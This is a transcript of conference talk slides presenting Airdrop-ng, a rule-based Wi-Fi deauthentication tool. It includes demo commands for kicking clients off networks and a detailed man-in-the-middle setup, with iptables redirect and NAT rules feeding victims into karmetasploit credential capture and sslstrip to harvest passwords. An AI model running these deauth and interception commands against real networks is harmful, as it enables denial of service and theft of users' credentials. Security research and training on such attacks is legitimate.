Transcript Airdrop_ng3

Airdrop-ng

It Gets People Off

Who are we? No one important, move along citizen...
• TheX1le
• Tuna
Will Speak for Beer

What are we doing here?

• Talk about a new tool that allows the facilitation of client control through unencrypted management frames
• Demonstrate some uses of Airdrop-ng
• Show an interesting MiTM when we are finished

What does it do!?!?

We have all used tools like:
• aireplay-ng -0
• mdk3
• Void11

Introducing the NEW Airdrop-ng. Airdrop-ng is like these tools but much better. Rules are the new sliced bread! Now enriched with vitamin PWN.

Requirements

Aircrack-ng Suite:
• airodump-ng

Lorcon-Old ("Lorcon 1")

Wireless Card/s:
• 1 card is a minimum, 2 cards are preferable

Optional Speed Increase:
• psyco JIT http://psyco.sourceforge.net/

Writing rules

Rules are broken down into 3 fields: action/ap/clients
• 2 options for the action field
• 5 options for the ap field
• 5 options for the clients field
Leading to 50 possible rule type combinations.

The Rule fields: Action

action/ap/client

Accepts a single character action:
• a - allow
• d - deny

Rule Field Actions: Allow and Deny

By default Airdrop-ng allows all wireless traffic... Pushing Go with no rules = no fun.

Rules are parsed in the order they are written.

Sample rules for a slow night of drinking:
• Allow beer
• Deny liquor

a/beer|any
d/liquor|me

The Fields: AP Field

action/ap/client

ap Field:
• ESSID
• BSSID
• Company OUI name value
• Company OUI numeric value
• any

AP Field: Scenario

action/ap/client

Scenario:

You do not want any clients connecting to a particular wireless network.

The target uses an ESSID of Brondo.

Solution:

d/Brondo|any

Deny access to anyone connecting to the target AP.

The Fields: Client Field

action/ap/client

client Field:
• mac
• multiple macs, ex. mac1,mac2,mac3
• Company OUI name value
• Company OUI numeric value
• any

The Fields: Client Field

action/ap/client

Scenario:

Deny access to Sparkle Motion for everyone but my wireless card.

Allow access to another access point that I am hosting.

a/SparkleMotion|33:26:36:00:00:00
a/00:33:FF:44:DD:32|any
d/any|any

Advanced OUI Based Rules

Rules based on vendor name or regex. Valid Rules:

d/00:25:2C|any
d/Apple Inc.|any
d/apple|apple
a/sony|any (regex matching)

Debug mode

Turning on the -b flag enables debug mode. This prints all rule matches out to the screen and allows you to troubleshoot your rules.

Using Airdrop-ng Putting the pieces together....

Airdrop-ng Usage

Placing card in monitor mode

Starting Airodump-ng

Example airdrop-ng rule file

Running Airdrop-ng with d/any|any and debug mode on

Airdrop-ng running with debug mode turned on and d/apple|any

Logging

Turning on -l will log all program output to a time stamped file in a logs folder in the current directory. Used in conjunction with -b it can be very useful to see what is going on.

The -l switch (that's L as in llama) adds logging. This creates a log directory inside your current working directory. It only outputs stdout and stderr, so if you do not have the debug switch you don't see all the rules that were triggered. Solution: add the debug switch.

Notice we have moved into the logging directory. Reading the logs shows exactly who is kicked & the rule that kicked them.

Lets Get Some People Off!!!

BLAT

Demo: Make AppleSauce

Steps:
• put card in monitor mode
  airmon-ng start wlan0
• start airodump
  airodump-ng -w tuna --output-format csv wlan0
• create rule file (apple.rules)
  d/any|apple
• fire up airdrop-ng
  python airdrop-ng.py -b -i wlan0 -t tuna-01.csv -r apple.rules

laugh maniacally

Airdrop-ng Possible Uses
• General Purpose Deauth tool
• Keeping Apple off your network
• Poor Man's WIPS
• Client Control
• Removing the air from the MacBook Air

Poor Man's WIPS Only allow your clients to talk to your access points, thus denying the users the ability to bypass your monitoring software.

Poor Man's WIPS continued

Scenario: You wish to restrict your users to only your office access points.

Steps:
• Create a list of your wireless client macs
  11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00
• Create the list of AP BSSIDs
  DE:AD:BE:EF:00:00
  BE:EF:DE:AD:00:00

Poor Man's WIPS continued

Create the rule file:

• Allow 3 clients to talk to BE:EF:DE:AD:00:00
  a/BE:EF:DE:AD:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00
• Allow 3 clients to talk to DE:AD:BE:EF:00:00
  a/DE:AD:BE:EF:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00
• Deny those 3 clients to any other access points
  d/any|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00

Start airdrop-ng.
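As an added example (not airdrop-ng's own code), a small Python evaluator for the rule syntax explained in the rule-field slides, run against the Poor Man's WIPS rule file above: it parses action/ap|clients lines, matches each field the way the field options describe (any, MAC, ESSID, OUI prefix, vendor name as regex) and applies the first matching rule in file order. The OUI table and the observed AP/client pairs are constructed sample values, and first-match-wins is an assumption drawn from "rules are parsed in the order they are written".

```python
import re
# Constructed OUI table standing in for airdrop-ng's vendor database (sample values).
OUI_NAMES = {"00:25:2C": "Apple Inc.", "00:1A:2B": "Sony Corp."}
MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)
OUI_RE = re.compile(r"^([0-9A-F]{2}:){2}[0-9A-F]{2}$", re.I)

# The talk's Poor Man's WIPS rule file: three managed clients may talk only to
# the two office APs; any other AP is denied for them (rule 3). Order matters.
WIPS_RULES = """
a/BE:EF:DE:AD:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00
a/DE:AD:BE:EF:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00
d/any|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00
"""

def parse_rule(line):
    """'action/ap|clients' -> (action, ap_value, [client values])."""
    action, rest = line.strip().split("/", 1)
    ap, clients = rest.split("|", 1)
    if action not in ("a", "d"):
        raise ValueError("action must be a (allow) or d (deny): %r" % line)
    return action, ap.strip(), [c.strip() for c in clients.split(",")]

def parse_rules(text):
    return [parse_rule(l) for l in text.splitlines() if l.strip()]

def field_matches(pattern, mac, essid=None):
    """One rule field against one station: any, exact MAC, ESSID (AP field
    only), OUI prefix, else vendor name as a case-insensitive regex."""
    if pattern == "any":
        return True
    if MAC_RE.match(pattern):
        return pattern.lower() == mac.lower()
    if essid is not None and pattern == essid:
        return True
    if OUI_RE.match(pattern):
        return mac[:8].upper() == pattern.upper()
    return re.search(pattern, OUI_NAMES.get(mac[:8].upper(), ""), re.I) is not None

def decide(rules, ap_mac, ap_essid, client_mac):
    """Rules are checked in file order and the first match wins; with no match
    airdrop-ng's default (allow) applies. Returns (action, rule index or None)."""
    for i, (action, ap, clients) in enumerate(rules):
        if field_matches(ap, ap_mac, ap_essid) and any(
                field_matches(c, client_mac) for c in clients):
            return action, i
    return "a", None

def wips_decision(ap_mac, ap_essid, client_mac):
    # The Poor Man's WIPS policy applied to one observed (AP, client) pair.
    return decide(parse_rules(WIPS_RULES), ap_mac, ap_essid, client_mac)
```

Feeding it the same (AP, client) pairs airodump-ng would report shows which rule fires for each, the same information the -b debug output gives you.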

Client Control Scenario

• Evil AP allowed to talk to all clients
  a/00:18:84:a2:eb:fd|any
• Allow your wireless card to talk to an AP with access to the intertubes
  a/any|00:17:F3:D4:32:CC
• Deny clients access to all other APs
  d/any|any

Sound Familiar?

Let's take a look back.....

Being too trusting

Clients are really trusting.

If you say your network is Foo, you must be, right?

It's very hard to avoid really bad behavior as a user.

Remember before? Roaming sure looks a lot like spoofing

Attacks in use Using airdrop to facilitate a MITM

Description: Airdrop kicks all clients with injection interface.

Clients are brought in with the Karma interface and NATed to the Internet.

Add some rules...

Add airdrop rules:

a/00:18:84:a2:eb:fd|any
d/any|any

This will drop all clients unless they are connected to our karma adapter.

MiTM Fun
• Client connects to network
• All traffic is redirected into metasploit capture modules with iptables markings
• Client opens browser and loads the http capture page with a redirect to google after 20 seconds
• Authentication iframes are loaded and passwords are logged
• An iptables rule is inserted that allows client access to port 53/dns
• Port 80/http gets redirected to the sslstrip proxy
• Clients are redirected through sslstrip to the Internet

IPTABLES

Cheap NATing:

iptables -F; iptables -t nat -F; iptables -t mangle -F
iptables -t nat -A POSTROUTING -o $TUBES -j MASQUERADE

Traffic Marking...hmmm sexy. Well, all these bastards go to karmetasploit.

iptables -I PREROUTING 1 -t nat -i $EVILLAN -j MARK --set-mark 99
iptables -t nat -A PREROUTING -m mark --mark 99 -j DNAT --to-destination 10.0.0.1

Can't forget SSLStrip...Thanks Moxie.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 2222

Well, they need DNS...Yes, you can DNS tunnel outside of the network.

iptables -t nat -A PREROUTING -p tcp --destination-port 53 -j MARK --set-mark 53
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j MARK --set-mark 53

All other ports that are not HTTP go back to karmetasploit.

iptables -t nat -A PREROUTING -m mark --mark 69 -j DNAT --to-destination 10.0.0.1

karmetasploit network

Capture credentials of these services: pop3, ftp, imap, smtp, fakedns

For HTTP Capture: captures saved browser passwords with a fake http service

So yea karmetasploit...Where's teh tubes?

iptables -I PREROUTING 2 -t nat -s 1.2.3.4 -j MARK --set-mark 69

Ah, the magic rule that takes people out of the karmetasploit network and gives them tubes.

Not unfettered tubes though. These tubes are special. The user is now allowed to use the proper DNS server that was issued in dhcp and can access the web through the SSLstrip Proxy.

Shouts HD.

sslstrip network

Proxy all web requests and serve plain HTTP back to the client while establishing an SSL tunnel to the site from the proxy. Now log into Facebook; Bitch.

Shouts to Moxie.

MiTM Fun Continued....

Start the setup script:
• bring teh internet up Al Gore style
• sets up internal gateway (iptables, nat, dhcp)
• bring up karmetasploit network
• mark all traffic to karmetasploit network
• bring up sslstrip network

Demo MiTM

Future directions for Airdrop-ng
• Integrated packet sniffer
  o No more dependency on airodump-ng
• Take rules on the command line instead of reading from a file
• Rule based wireless fuzzing framework
• Log file time stamps

Where did we go today

Recap:
• Clients are still a very easy target
• Wireless Deauth Rules = Next Sliced Bread
• Airdrop-ng is great for facilitating a shim for MiTM attacks & Client Control
• Management frame abuse is still a very viable attack vector

Shouts

Roamer, Marfi, Mubix, Zero_Chaos, Rel1k, LateNite, d4s, fishsticks, and mellencock

For their hard work: HDM, Moxie, dragorn

TheX1le: thex1le{-at-}gmail
Tuna: secretpackets{-at-}gmail

Pentoo
• Pen-testing Live CD 2009.0 Release
• Available at www.pentoo.ch
• Updated tools and drivers patched and ready
• Airdrop-ng Module available in two weeks
• See the Pentoo Firetalk in Wilson at 8:45pm